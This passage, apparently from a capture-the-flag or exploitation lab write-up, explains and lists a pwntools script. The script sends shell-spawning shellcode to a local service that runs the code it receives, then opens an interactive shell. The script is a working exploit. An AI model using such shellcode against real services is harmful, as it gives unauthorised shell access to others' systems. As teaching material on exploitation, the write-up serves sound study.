The binary seems to directly execute the machine code sent by the user.
Let’s write a basic pwntools script:
- Architecture Context: The context(
arch='amd64') specifies that the shellcode should be generated for a 64-bit architecture. - Generate Shellcode:
asm(shellcraft.sh())generates a simple shellcode that spawns a/bin/bashshell. - Remote Connection:
remote('127.0.0.1', 4000)establishes a connection to the target at localhost on port 4000. - Clean the Input:
proc.clean()clears any old data from the connection to make sure we send clean input. - Send Shellcode:
proc.sendline(shellcode)sends the shellcode to the remote service. - Execute a Command:
proc.sendline(b'uname -a')sends a command (uname -a) to the remote system to check the environment or confirm access. - Interactive Mode: Finally,
proc.interactive()switches to interactive mode, allowing you to interact with the shell once the payload is executed.
#!/usr/bin/python
from pwn import *
# Set the architecture context to 64-bit
context(arch='amd64')
# Generate the shellcode to spawn a shell (using /bin/bash)
shellcode = asm(shellcraft.sh())
# Connect to the remote service (localhost, port 4000)
proc = remote('127.0.0.1', 4000)
# Clean any previous data from the connection
proc.clean()
# Send the shellcode to the remote service
print("[*] Sending shellcode to the remote service...")
proc.sendline(shellcode)
# Send an additional command to test the shell
print("[*] Sending 'uname -a' to check the system...")
proc.sendline(b'uname -a')
# Switch to interactive mode so we can interact with the shell
print("[*] Interactive shell opened...")
proc.interactive()